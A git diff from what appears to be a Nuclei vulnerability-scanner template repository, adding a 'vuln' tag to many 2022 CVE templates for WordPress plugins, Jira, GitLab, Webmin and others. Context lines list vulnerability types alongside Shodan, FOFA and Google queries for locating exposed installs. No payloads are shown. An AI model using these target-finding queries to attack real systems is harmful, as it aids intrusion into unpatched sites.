@@ info: vendor: cerber product: wp_cerber_security\,_anti-spam_\&_malware_scan framework: wordpress - tags: cve,cve2022,wp,wp-plugin,wpscan,wordpress,xss,wp-cerber,authenticated,vkev + tags: cve,cve2022,wp,wp-plugin,wpscan,wordpress,xss,wp-cerber,authenticated,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index e336d0e65c7..11a722b42ce 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: joinmastodon product: mastodon - tags: cve,cve2022,mastodon,prototype,huntr,joinmastodon + tags: cve,cve2022,mastodon,prototype,huntr,joinmastodon,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index eb8cd0b04d2..3f38ebcc8ff 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -30,7 +30,7 @@ info: vendor: a3rev product: page_view_count framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev,vkev + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index ee5d146e924..7762621d3c2 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -28,7 +28,7 @@ info: vendor: karma_project product: karma framework: node.js - tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js,passive + tags: cve2022,cve,oss,huntr,karma,xss,karma_project,node.js,passive,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 4dee513a639..699bbc11f47 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -30,7 +30,7 @@ info: vendor: stylemixthemes product: masterstudy_lms framework: wordpress - tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes,vkev + tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,unauth,stylemixthemes,vkev,vuln variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" password: "{{rand_text_alphanumeric(12)}}" diff --git a/http/cves/2022/CVE-2022-0479.yaml b/http/cves/2022/CVE-2022-0479.yaml index a1156aeaf51..eff955455ba 100644 --- a/http/cves/2022/CVE-2022-0479.yaml +++ b/http/cves/2022/CVE-2022-0479.yaml @@ -25,7 +25,7 @@ info: product: popup_builder framework: wordpress fofa-query: body="/wp-content/plugins/popup-builder" - tags: cve,cve2022,wp,wp-plugin,wordpress,popup-builder,xss,sqli,authenticated + tags: cve,cve2022,wp,wp-plugin,wordpress,popup-builder,xss,sqli,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index f45a9403d50..e74886e2599 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -29,7 +29,7 @@ info: vendor: easyappointments product: easyappointments framework: wordpress - tags: cve,cve2022,easyappointments,huntr,wordpress,vkev + tags: cve,cve2022,easyappointments,huntr,wordpress,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index ce6f995ebab..96803109520 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ fofa-query: body=/wp-content/plugins/ditty-news-ticker/ publicwww-query: "/wp-content/plugins/ditty-news-ticker/" - tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated,metaphorcreations + tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated,metaphorcreations,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 1622f27e52b..6b9e039f66c 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -30,7 +30,7 @@ info: vendor: e2pdf product: e2pdf framework: wordpress - tags: cve,cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,wordpress,wp + tags: cve,cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,wordpress,wp,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index c73a7330663..742fda5bfba 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -30,7 +30,7 @@ info: shodan-query: - "http.component:\"Atlassian Jira\"" - http.component:"atlassian jira" - tags: cve,cve2022,atlassian,jira,exposure,auth-bypass,vkev + tags: cve,cve2022,atlassian,jira,exposure,auth-bypass,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index ee5a6e3bc6b..99727403b34 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -28,7 +28,7 @@ info: product: formcraft3 framework: wordpress fofa-query: "body=\"formcraft3\" && body=\"wp-\"" - tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev + tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0592.yaml b/http/cves/2022/CVE-2022-0592.yaml index 48e930c665a..384e1d07059 100644 --- a/http/cves/2022/CVE-2022-0592.yaml +++ b/http/cves/2022/CVE-2022-0592.yaml @@ -23,7 +23,7 @@ info: product: mapsvg framework: wordpress fofa-query: body="/wp-content/plugins/mapsvg/" - tags: wpscan,cve,cve2022,mapsvg,wordpress,wp,wp-plugin,sqli,time-based-sqli,vkev + tags: wpscan,cve,cve2022,mapsvg,wordpress,wp,wp-plugin,sqli,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index b5d70caca00..3eb1f1caf02 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -29,7 +29,7 @@ info: vendor: shareaholic product: shareaholic framework: wordpress - tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan,shareaholic + tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan,shareaholic,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index be51746531d..226dfd45286 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -28,7 +28,7 @@ info: vendor: codedropz product: drag_and_drop_multiple_file_upload_-_contact_form_7 framework: wordpress - tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth,codedropz + tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth,codedropz,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index f35ed9ea82f..67eaeaad931 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -30,7 +30,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,huntr,microweber,redirect,oss + tags: cve,cve2022,huntr,microweber,redirect,oss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 43d47d79c46..3b4dc0b6213 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -29,7 +29,7 @@ info: vendor: mapping_multiple_urls_redirect_same_page_project product: mapping_multiple_urls_redirect_same_page framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan,mapping_multiple_urls_redirect_same_page_project + tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan,mapping_multiple_urls_redirect_same_page_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index bae6cf397a5..8bd6064ad39 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -31,7 +31,7 @@ info: fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: /wp-content/plugins/wp-statistics/ google-query: inurl:/wp-content/plugins/wp-statistics - tags: time-based-sqli,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs + tags: time-based-sqli,cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 09acd82715a..b2991659f63 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -28,7 +28,7 @@ info: vendor: cozmoslabs product: profile_builder framework: wordpress - tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs,vkev + tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 7c53283ea77..bba1723796c 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -29,7 +29,7 @@ info: vendor: webtoprint product: web_to_print_shop\ google-query: inurl:"/wp-content/plugins/udraw" - tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint,vkev + tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index 13b78a88798..81df80063a9 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -27,7 +27,7 @@ info: product: commonsbooking framework: wordpress google-query: inurl:/wp-content/plugin/commonsbooking/ - tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,commonsbooking,sqli,wpscan,wielebenwir,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 6463ec769f9..c4a9fd5171c 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,microweber,disclosure,authenticated,huntr + tags: cve,cve2022,microweber,disclosure,authenticated,huntr,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 9970b08e2c6..8bfa4308477 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -29,7 +29,7 @@ info: fofa-query: - icon_hash=780351152 - body="microweber" - tags: cve,huntr,crlf,microweber,cve2022 + tags: cve,huntr,crlf,microweber,cve2022,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 3ac4c5c093d..935b8c26464 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,huntr,xss,microweber + tags: cve,cve2022,huntr,xss,microweber,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index b97c1576e47..965912a37f5 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -30,7 +30,7 @@ info: vendor: narnoo_distributor_project product: narnoo_distributor framework: wordpress - tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project,vkev + tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 6871f014ad5..0fb7f2fe1a0 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: alltube_project product: alltube - tags: cve,cve2022,huntr,redirect,rudloff,alltube,alltube_project + tags: cve,cve2022,huntr,redirect,rudloff,alltube,alltube_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 7ae5f342e52..1e812df6a56 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -30,7 +30,7 @@ info: vendor: devbunch product: master_elements framework: wordpress - tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch + tags: time-based-sqli,cve2022,cve,unauth,wpscan,wp-plugin,wp,sqli,wordpress,master-elements,devbunch,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 1449891a970..104646cd898 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -33,7 +33,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve,cve2022,gitlab + tags: cve,cve2022,gitlab,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index f7f49892048..07b4d17491e 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -29,7 +29,7 @@ info: vendor: quantumcloud product: infographic_maker framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud,vkev + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,infographic-and-list-builder-ilist,wpscan,quantumcloud,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index fab472c633e..70fe0b519b2 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -30,7 +30,7 @@ info: vendor: quantumcloud product: simple_link_directory framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud,vkev + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 97a7da69ec1..74df7e685da 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -30,7 +30,7 @@ info: vendor: usersultra product: users_ultra framework: wordpress - tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra,vkev + tags: time-based-sqli,cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index e6101ca715c..ff1b5bbb28a 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -28,7 +28,7 @@ info: vendor: documentor_project product: documentor framework: wordpress - tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project + tags: time-based-sqli,cve2022,cve,unauth,sqli,wp-plugin,wp,documentor-lite,wpscan,wordpress,documentor_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index f8d35955330..81c8f3f8542 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -27,7 +27,7 @@ info: vendor: revealjs product: reveal.js framework: node.js - tags: cve,cve2022,hackerone,huntr,headless,postmessage,revealjs,node.js + tags: cve,cve2022,hackerone,huntr,headless,postmessage,revealjs,node.js,vuln headless: - steps: - args: diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index ebd78e54f14..91566c05cd9 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -30,7 +30,7 @@ info: vendor: nirweb product: nirweb_support framework: wordpress - tags: cve2022,cve,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb,vkev + tags: cve2022,cve,wordpress,wp-plugin,wp,sqli,wpscan,nirweb-support,unauth,nirweb,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0783.yaml b/http/cves/2022/CVE-2022-0783.yaml index 37054e3e1af..7ec63f09c2b 100644 --- a/http/cves/2022/CVE-2022-0783.yaml +++ b/http/cves/2022/CVE-2022-0783.yaml @@ -25,7 +25,7 @@ info: vendor: themehigh product: multiple_shipping_addresses_for_woocommerce fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce" - tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli + tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 23c7d64d352..8122e73554d 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -30,7 +30,7 @@ info: vendor: title_experiments_free_project product: title_experiments_free framework: wordpress - tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project,vkev + tags: time-based-sqli,cve2022,cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,wordpress,title_experiments_free_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 1548bef2f2b..6e6bb1de313 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -30,7 +30,7 @@ info: vendor: daily_prayer_time_project product: daily_prayer_time framework: wordpress - tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project + tags: time-based-sqli,cve2022,cve,sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,wp,daily_prayer_time_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 95a1bae1e17..d6ef4477f63 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -30,7 +30,7 @@ info: vendor: iqonic product: kivicare framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic,vkev + tags: time-based-sqli,cve,cve2022,sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,wpscan,iqonic,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 1224886c85f..c161710a3a5 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -26,7 +26,7 @@ info: vendor: limit_login_attempts_project product: limit_login_attempts framework: wordpress - tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project + tags: time-based-sqli,cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 317be1a1227..d9db4674929 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -30,7 +30,7 @@ info: vendor: wpmet product: wp_fundraising_donation_and_crowdfunding_platform framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet + tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth,wpscan,wpmet,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index c05e1c158ae..52f9ba697d5 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/ubigeo-peru/ fofa-query: body=/wp-content/plugins/ubigeo-peru/ publicwww-query: "/wp-content/plugins/ubigeo-peru/" - tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project + tags: cve,cve2022,wordpress,wpscan,wp-plugin,sqli,ubigeo-peru,unauth,ubigeo_de_peru_para_woocommerce_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 0bb9082b4c9..22c65d5f0f5 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -30,7 +30,7 @@ info: vendor: badgeos product: badgeos framework: wordpress - tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress + tags: cve,cve2022,wp,unauth,sqli,wp-plugin,badgeos,wpscan,wordpress,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index b42fab34fa9..5a7d13b2d7b 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: cve,cve2022,rce,oss,huntr,webmin,authenticated + tags: cve,cve2022,rce,oss,huntr,webmin,authenticated,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 6c714d7aed5..f5200e5dd9f 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -30,7 +30,7 @@ info: vendor: wp-video-gallery-free_project product: wp-video-gallery-free framework: wordpress - tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project,vkev + tags: time-based-sqli,cve,cve2022,wp-plugin,wpscan,wordpress,wp,sqli,wp-video-gallery-free,unauth,wp-video-gallery-free_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 303789ac2e6..b7850b400dc 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -30,7 +30,7 @@ info: vendor: presspage product: bestbooks framework: wordpress - tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage,vkev + tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index b7913d1f69e..f70ba0146f1 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -29,7 +29,7 @@ info: vendor: speakout\!_email_petitions_project product: speakout\!_email_petitions framework: wordpress - tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project,vkev + tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 1f0b5ddc510..c931450168d 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -29,7 +29,7 @@ info: vendor: updraftplus product: updraftplus framework: wordpress - tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress + tags: wpscan,cve,cve2022,xss,authenticated,updraftplus,wp-plugin,wp,wordpress,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 6499c734a83..5d45b3317f8 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -30,7 +30,7 @@ info: vendor: reputeinfosystems product: pricing_table framework: wordpress - tags: time-based-sqli,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems,vkev + tags: time-based-sqli,cve,cve2022,unauth,wp,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,reputeinfosystems,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 6f906465dfe..6aa3c2a49bb 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -26,7 +26,7 @@ info: max-request: 4 vendor: spirit-project product: spirit - tags: cve,cve2022,huntr,redirect,nitely,spirit,spirit-project + tags: cve,cve2022,huntr,redirect,nitely,spirit,spirit-project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index 1ee69aa2960..a0650dd3b7a 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -33,7 +33,7 @@ info: - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" google-query: intitle:"sign in - gogs" - tags: cve,cve2022,ssrf,gogs,authenticated,huntr + tags: cve,cve2022,ssrf,gogs,authenticated,huntr,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index c9766f8df40..9154ca690ed 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -29,7 +29,7 @@ info: vendor: memberhero product: member_hero framework: wordpress - tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero,vkev + tags: cve,cve2022,unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,memberhero,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-0899.yaml b/http/cves/2022/CVE-2022-0899.yaml index 3857babd5b0..913f817f4f4 100644 --- a/http/cves/2022/CVE-2022-0899.yaml +++ b/http/cves/2022/CVE-2022-0899.yaml @@ -24,7 +24,7 @@ info: product: header_footer_code_manager framework: wordpress google-query: inurl:"/wp-content/plugins/wp-custom-pages/" - tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress + tags: cve2022,cve,wpscan,wp,wp-plugin,wordpress,xss,authenticated,draftpress,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index 4cd4b499b12..30161da0016 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve2022,cve,authenticated,huntr,xss,microweber,cms + tags: cve2022,cve,authenticated,huntr,xss,microweber,cms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 6939e8b994c..1ecb4fa6e0b 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -30,7 +30,7 @@ info: vendor: pluginbazaar product: order_listener_for_woocommerce framework: wordpress - tags: time-based-sqli,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar + tags: time-based-sqli,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 1059a2e12a7..2ca3afddcc7 